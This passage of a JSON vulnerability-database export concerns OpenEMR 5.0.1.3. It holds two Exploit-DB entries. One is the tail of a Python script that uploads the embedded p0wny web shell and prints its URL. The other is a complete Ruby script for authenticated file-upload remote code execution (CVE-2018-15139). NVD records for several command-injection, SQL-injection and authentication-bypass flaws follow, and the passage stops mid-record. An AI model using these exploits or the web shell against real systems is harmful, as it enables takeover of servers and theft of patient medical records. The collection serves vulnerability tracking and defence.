// Backend shell TERM environment variable not set. Clear command history from UI but keep in buffer\\n eShellContent.innerHTML = '';\\n } else {\\n makeRequest(\\\"?feature=shell\\\", {cmd: command, cwd: CWD}, function (response) {\\n if (response.hasOwnProperty('file')) {\\n featureDownload(response.name, response.file)\\n } else {\\n _insertStdout(response.stdout.join(\\\"\\\\n\\\"));\\n updateCwd(response.cwd);\\n }\\n });\\n }\\n }\\n\\n function featureHint() {\\n if (eShellCmdInput.value.trim().length === 0) return; // field is empty -> nothing to complete\\n\\n function _requestCallback(data) {\\n if (data.files.length <= 1) return; // no completion\\n\\n if (data.files.length === 2) {\\n if (type === 'cmd') {\\n eShellCmdInput.value = data.files[0];\\n } else {\\n var currentValue = eShellCmdInput.value;\\n eShellCmdInput.value = currentValue.replace(/([^\\\\s]*)$/, data.files[0]);\\n }\\n } else {\\n _insertCommand(eShellCmdInput.value);\\n _insertStdout(data.files.join(\\\"\\\\n\\\"));\\n }\\n }\\n\\n var currentCmd = eShellCmdInput.value.split(\\\" \\\");\\n var type = (currentCmd.length === 1) ? \\\"cmd\\\" : \\\"file\\\";\\n var fileName = (type === \\\"cmd\\\") ? currentCmd[0] : currentCmd[currentCmd.length - 1];\\n\\n makeRequest(\\n \\\"?feature=hint\\\",\\n {\\n filename: fileName,\\n cwd: CWD,\\n type: type\\n },\\n _requestCallback\\n );\\n\\n }\\n\\n function featureDownload(name, file) {\\n var element = document.createElement('a');\\n element.setAttribute('href', 'data:application/octet-stream;base64,' + file);\\n element.setAttribute('download', name);\\n element.style.display = 'none';\\n document.body.appendChild(element);\\n element.click();\\n document.body.removeChild(element);\\n _insertStdout('Done.');\\n }\\n\\n function featureUpload(path) {\\n var element = document.createElement('input');\\n element.setAttribute('type', 'file');\\n element.style.display = 'none';\\n document.body.appendChild(element);\\n element.addEventListener('change', function () {\\n var promise = getBase64(element.files[0]);\\n promise.then(function (file) {\\n makeRequest('?feature=upload', {path: path, file: file, cwd: CWD}, function (response) {\\n _insertStdout(response.stdout.join(\\\"\\\\n\\\"));\\n updateCwd(response.cwd);\\n });\\n }, function () {\\n _insertStdout('An unknown client-side error occurred.');\\n });\\n });\\n element.click();\\n document.body.removeChild(element);\\n }\\n\\n function getBase64(file, onLoadCallback) {\\n return new Promise(function(resolve, reject) {\\n var reader = new FileReader();\\n reader.onload = function() { resolve(reader.result.match(/base64,(.*)$/)[1]); };\\n reader.onerror = reject;\\n reader.readAsDataURL(file);\\n });\\n }\\n\\n function genPrompt(cwd) {\\n cwd = cwd || \\\"~\\\";\\n var shortCwd = cwd;\\n if (cwd.split(\\\"/\\\").length > 3) {\\n var splittedCwd = cwd.split(\\\"/\\\");\\n shortCwd = \\\"\\xe2\\x80\\xa6/\\\" + splittedCwd[splittedCwd.length-2] + \\\"/\\\" + splittedCwd[splittedCwd.length-1];\\n }\\n return \\\"p0wny@shell:<span title=\\\\\\\"\\\" + cwd + \\\"\\\\\\\">\\\" + shortCwd + \\\"</span>#\\\";\\n }\\n\\n function updateCwd(cwd) {\\n if (cwd) {\\n CWD = cwd;\\n _updatePrompt();\\n return;\\n }\\n makeRequest(\\\"?feature=pwd\\\", {}, function(response) {\\n CWD = response.cwd;\\n _updatePrompt();\\n });\\n\\n }\\n\\n function escapeHtml(string) {\\n return string\\n .replace(/&/g, \\\"&\\\")\\n .replace(/</g, \\\"<\\\")\\n .replace(/>/g, \\\">\\\");\\n }\\n\\n function _updatePrompt() {\\n var eShellPrompt = document.getElementById(\\\"shell-prompt\\\");\\n eShellPrompt.innerHTML = genPrompt(CWD);\\n }\\n\\n function _onShellCmdKeyDown(event) {\\n switch (event.key) {\\n case \\\"Enter\\\":\\n featureShell(eShellCmdInput.value);\\n insertToHistory(eShellCmdInput.value);\\n eShellCmdInput.value = \\\"\\\";\\n break;\\n case \\\"ArrowUp\\\":\\n if (historyPosition > 0) {\\n historyPosition--;\\n eShellCmdInput.blur();\\n eShellCmdInput.value = commandHistory[historyPosition];\\n _defer(function() {\\n eShellCmdInput.focus();\\n });\\n }\\n break;\\n case \\\"ArrowDown\\\":\\n if (historyPosition >= commandHistory.length) {\\n break;\\n }\\n historyPosition++;\\n if (historyPosition === commandHistory.length) {\\n eShellCmdInput.value = \\\"\\\";\\n } else {\\n eShellCmdInput.blur();\\n eShellCmdInput.focus();\\n eShellCmdInput.value = commandHistory[historyPosition];\\n }\\n break;\\n case 'Tab':\\n event.preventDefault();\\n featureHint();\\n break;\\n }\\n }\\n\\n function insertToHistory(cmd) {\\n commandHistory.push(cmd);\\n historyPosition = commandHistory.length;\\n }\\n\\n function makeRequest(url, params, callback) {\\n function getQueryString() {\\n var a = [];\\n for (var key in params) {\\n if (params.hasOwnProperty(key)) {\\n a.push(encodeURIComponent(key) + \\\"=\\\" + encodeURIComponent(params[key]));\\n }\\n }\\n return a.join(\\\"&\\\");\\n }\\n var xhr = new XMLHttpRequest();\\n xhr.open(\\\"POST\\\", url, true);\\n xhr.setRequestHeader(\\\"Content-Type\\\", \\\"application/x-www-form-urlencoded\\\");\\n xhr.onreadystatechange = function() {\\n if (xhr.readyState === 4 && xhr.status === 200) {\\n try {\\n var responseJson = JSON.parse(xhr.responseText);\\n callback(responseJson);\\n } catch (error) {\\n alert(\\\"Error while parsing response: \\\" + error);\\n }\\n }\\n };\\n xhr.send(getQueryString());\\n }\\n\\n document.onclick = function(event) {\\n event = event || window.event;\\n var selection = window.getSelection();\\n var target = event.target || event.srcElement;\\n\\n if (target.tagName === \\\"SELECT\\\") {\\n return;\\n }\\n\\n if (!selection.toString()) {\\n eShellCmdInput.focus();\\n }\\n };\\n\\n window.onload = function() {\\n eShellCmdInput = document.getElementById(\\\"shell-cmd\\\");\\n eShellContent = document.getElementById(\\\"shell-content\\\");\\n updateCwd();\\n eShellCmdInput.focus();\\n };\\n </script>\\n </head>\\n\\n <body>\\n <div id=\\\"shell\\\">\\n <pre id=\\\"shell-content\\\">\\n <div id=\\\"shell-logo\\\">\\n ___ ____ _ _ _ _ _ <span></span>\\n _ __ / _ \\\\__ ___ __ _ _ / __ \\\\ ___| |__ ___| | |_ /\\\\/|| || |_ <span></span>\\n| '_ \\\\| | | \\\\ \\\\ /\\\\ / / '_ \\\\| | | |/ / _` / __| '_ \\\\ / _ \\\\ | (_)/\\\\/_ .. _|<span></span>\\n| |_) | |_| |\\\\ V V /| | | | |_| | | (_| \\\\__ \\\\ | | | __/ | |_ |_ _|<span></span>\\n| .__/ \\\\___/ \\\\_/\\\\_/ |_| |_|\\\\__, |\\\\ \\\\__,_|___/_| |_|\\\\___|_|_(_) |_||_| <span></span>\\n|_| |___/ \\\\____/ <span></span>\\n </div>\\n </pre>\\n <div id=\\\"shell-input\\\">\\n <label for=\\\"shell-cmd\\\" id=\\\"shell-prompt\\\" class=\\\"shell-prompt\\\">???</label>\\n <div>\\n <input id=\\\"shell-cmd\\\" name=\\\"cmd\\\" onkeydown=\\\"_onShellCmdKeyDown(event)\\\"/>\\n </div>\\n </div>\\n </div>\\n </body>\\n\\n</html>\\n\\r\\n-----------------------------31900464228840324774249185339\\r\\nContent-Disposition: form-data; name=\\\"form_dest_filename\\\"\\r\\n\\r\\n\\r\\n-----------------------------31900464228840324774249185339\\r\\nContent-Disposition: form-data; name=\\\"form_education\\\"; filename=\\\"\\\"\\r\\nContent-Type: application/octet-stream\\r\\n\\r\\n\\r\\n-----------------------------31900464228840324774249185339\\r\\nContent-Disposition: form-data; name=\\\"bn_save\\\"\\r\\n\\r\\nSave\\r\\n-----------------------------31900464228840324774249185339--\\r\\n\"\n\n# Send Exploit:\nsession.post(exploit_url, headers=header, data=body)\n\n# Finish\npath = 'http://' + target_ip + ':' + target_port + openemr_path + '/sites/default/images/shell.php'\nprint('[+] Webshell: ' + path)", "sourceHref": "https://gitlab.com/exploit-database/exploitdb/-/raw/main/exploits/php/webapps/49998.py", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-06-07T18:30:16", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-13T00:00:00", "type": "exploitdb", "title": "OpenEMR 5.0.1.3 - &#039;manage_site_files&#039; Remote Code Execution (Authenticated) (2)", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["2018-15139", "CVE-2018-15139", "CVE-2019-14530"], "modified": "2021-07-13T00:00:00", "id": "EDB-ID:50122", "href": "https://www.exploit-db.com/exploits/50122", "sourceData": "# Title: OpenEMR 5.0.1.3 - 'manage_site_files' Remote Code Execution (Authenticated) (2)\n# Exploit author: noraj (Alexandre ZANNI) for SEC-IT (http://secit.fr)\n# Date: 2021-07-05\n# Vendor Homepage: https://www.open-emr.org/\n# Software Link: https://github.com/openemr/openemr/archive/v5_0_1_3.tar.gz\n# Docker PoC: https://github.com/sec-it/exploit-CVE-2018-15139/blob/master/docker-compose.yml\n# Version: < 5.0.1.4 (it means up to 5.0.1.3)\n# Tested on: OpenEMR Version 5.0.0.8\n# References: https://www.exploit-db.com/exploits/49998\n# CVE: CVE-2018-15139\n# CWE: CWE-434\n# Patch: https://github.com/openemr/openemr/pull/1757/commits/c2808a0493243f618bbbb3459af23c7da3dc5485\n\n#!/usr/bin/env ruby\n\nrequire 'pathname'\nrequire 'httpx'\nrequire 'http/form_data'\nrequire 'docopt'\n\ndoc = <<~DOCOPT\n OpenEMR < 5.0.1.4 - (Authenticated) File upload - Remote command execution\n\n Source: https://github.com/sec-it/exploit-CVE-2019-14530\n\n Usage:\n #{__FILE__} exploit <url> <filename> <username> <password> [--debug]\n #{__FILE__} -h | --help\n\n Options:\n <url> Root URL (base path) including HTTP scheme, port and root folder\n <filename> Filename of the shell to be uploaded\n <username> Username of the admin\n <password> Password of the admin\n --debug Display arguments\n -h, --help Show this screen\n\n Examples:\n #{__FILE__} exploit http://example.org/openemr shell.php admin pass\n #{__FILE__} exploit https://example.org:5000/ shell.php admin pass\nDOCOPT\n\ndef login(root_url, user, pass, http)\n vuln_url = \"#{root_url}/interface/main/main_screen.php?auth=login&site=default\"\n params = {\n 'new_login_session_management' => '1',\n 'authProvider' => 'Default',\n 'authUser' => user,\n 'clearPass' => pass,\n 'languageChoice' => '1'\n }\n\n http.post(vuln_url, form: params).body.to_s\nend\n\ndef upload(root_url, filepath, http)\n vuln_url = \"#{root_url}/interface/super/manage_site_files.php\"\n pn = Pathname.new(filepath)\n\n params = {\n form_image: {\n content_type: 'application/x-php',\n filename: pn.basename.to_s,\n body: pn\n },\n bn_save: 'Save'\n }\n\n res = http.post(vuln_url, form: params)\n\n return '[-] File not upload' unless (200..299).include?(res.status)\n\n \"[+] File uploaded:\\n#{root_url}/sites/default/images/#{pn.basename}\"\nend\n\nbegin\n args = Docopt.docopt(doc)\n pp args if args['--debug']\n\n if args['exploit']\n http = HTTPX.plugin(:cookies).plugin(:follow_redirects).plugin(:multipart)\n login(args['<url>'], args['<username>'], args['<password>'], http)\n puts upload(args['<url>'], args['<filename>'], http)\n end\nrescue Docopt::Exit => e\n puts e.message\nend", "sourceHref": "https://gitlab.com/exploit-database/exploitdb/-/raw/main/exploits/php/webapps/50122.rb", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2023-06-07T14:30:49", "description": "OS command injection occurring in versions of OpenEMR before 5.0.1.4 allows a remote authenticated attacker to execute arbitrary commands by making a crafted request to interface/fax/fax_dispatch.php after modifying the \"hylafax_enscript\" global variable in interface/super/edit_globals.php.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-08-15T17:29:00", "type": "cve", "title": "CVE-2018-15155", "cwe": ["CWE-78"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-15155"], "modified": "2018-10-10T17:19:00", "cpe": [], "id": "CVE-2018-15155", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-15155", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2023-06-07T14:30:53", "description": "OS command injection occurring in versions of OpenEMR before 5.0.1.4 allows a remote authenticated attacker to execute arbitrary commands by making a crafted request to interface/billing/sl_eob_search.php after modifying the \"print_command\" global variable in interface/super/edit_globals.php.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-08-15T17:29:00", "type": "cve", "title": "CVE-2018-15154", "cwe": ["CWE-78"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-15154"], "modified": "2018-10-10T17:21:00", "cpe": [], "id": "CVE-2018-15154", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-15154", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2023-06-07T14:30:54", "description": "OS command injection occurring in versions of OpenEMR before 5.0.1.4 allows a remote authenticated attacker to execute arbitrary commands by making a crafted request to interface/main/daemon_frame.php after modifying the \"hylafax_server\" global variable in interface/super/edit_globals.php.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-08-15T17:29:00", "type": "cve", "title": "CVE-2018-15153", "cwe": ["CWE-78"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-15153"], "modified": "2018-10-10T17:20:00", "cpe": [], "id": "CVE-2018-15153", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-15153", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2023-06-07T14:30:52", "description": "OS command injection occurring in versions of OpenEMR before 5.0.1.4 allows a remote authenticated attacker to execute arbitrary commands by making a crafted request to interface/fax/faxq.php after modifying the \"hylafax_server\" global variable in interface/super/edit_globals.php.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-08-15T17:29:00", "type": "cve", "title": "CVE-2018-15156", "cwe": ["CWE-78"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-15156"], "modified": "2018-10-10T17:17:00", "cpe": [], "id": "CVE-2018-15156", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-15156", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2023-06-07T14:30:54", "description": "SQL injection vulnerability in interface/de_identification_forms/de_identification_screen2.php in versions of OpenEMR before 5.0.1.4 allows a remote authenticated attacker to execute arbitrary SQL commands via the 'temporary_files_dir' variable in interface/super/edit_globals.php.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-08-15T17:29:00", "type": "cve", "title": "CVE-2018-15150", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-15150"], "modified": "2018-10-12T13:10:00", "cpe": ["cpe:/a:open-emr:openemr:5.0.1.3"], "id": "CVE-2018-15150", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-15150", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:open-emr:openemr:5.0.1.3:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-07T14:30:48", "description": "SQL injection vulnerability in interface/patient_file/encounter/search_code.php in versions of OpenEMR before 5.0.1.4 allows a remote authenticated attacker to execute arbitrary SQL commands via the 'text' parameter.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-08-15T17:29:00", "type": "cve", "title": "CVE-2018-15148", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-15148"], "modified": "2018-10-12T13:08:00", "cpe": ["cpe:/a:open-emr:openemr:5.0.1.3"], "id": "CVE-2018-15148", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-15148", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:open-emr:openemr:5.0.1.3:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-07T14:30:48", "description": "SQL injection vulnerability in interface/de_identification_forms/find_immunization_popup.php in versions of OpenEMR before 5.0.1.4 allows a remote authenticated attacker to execute arbitrary SQL commands via the 'search_term' parameter.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-08-15T17:29:00", "type": "cve", "title": "CVE-2018-15146", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-15146"], "modified": "2018-10-11T16:41:00", "cpe": ["cpe:/a:open-emr:openemr:5.0.1.3"], "id": "CVE-2018-15146", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-15146", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:open-emr:openemr:5.0.1.3:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-07T14:30:52", "description": "SQL injection vulnerability in interface/forms_admin/forms_admin.php from library/registry.inc in versions of OpenEMR before 5.0.1.4 allows a remote authenticated attacker to execute arbitrary SQL commands via the 'id' parameter.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-08-15T17:29:00", "type": "cve", "title": "CVE-2018-15147", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-15147"], "modified": "2018-10-12T13:07:00", "cpe": ["cpe:/a:open-emr:openemr:5.0.1.3"], "id": "CVE-2018-15147", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-15147", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:open-emr:openemr:5.0.1.3:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-07T14:30:55", "description": "Authentication bypass vulnerability in portal/account/register.php in versions of OpenEMR before 5.0.1.4 allows a remote attacker to access (1) portal/add_edit_event_user.php, (2) portal/find_appt_popup_user.php, (3) portal/get_allergies.php, (4) portal/get_amendments.php, (5) portal/get_lab_results.php, (6) portal/get_medications.php, (7) portal/get_patient_documents.php, (8) portal/get_problems.php, (9) portal/get_profile.php, (10) portal/portal_payment.php, (11) portal/messaging/messages.php, (12) portal/messaging/secure_chat.php, (13) portal/report/pat_ledger.php, (14) portal/report/portal_custom_report.php, or (15) portal/report/portal_patient_report.php without authenticating as a patient.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2018-08-15T17:29:00", "type": "cve", "title": "CVE-2018-15152", "cwe": ["CWE-287"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-15152"], "modified": "2022-02-10T07:24:00", "cpe": [], "id": "CVE-2018-15152", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-15152", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}, "cpe23": []}, {"lastseen": "2023-06-07T14:30:52", "description": "SQL injection vulnerability in interface/forms/eye_mag/php/Anything_simple.php from library/forms.inc in versions of OpenEMR before 5.0.1.4 allows a remote authenticated attacker to execute arbitrary SQL commands via the 'encounter' parameter.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-08-15T17:29:00", "type": "cve", "title": "CVE-2018-15149", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-15149"], "modified": "2018-10-12T13:10:00", "cpe": ["cpe:/a:open-emr:openemr:5.0.1.3"], "id": "CVE-2018-15149", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-15149", "cvss": {"score": 6.5, "vector": 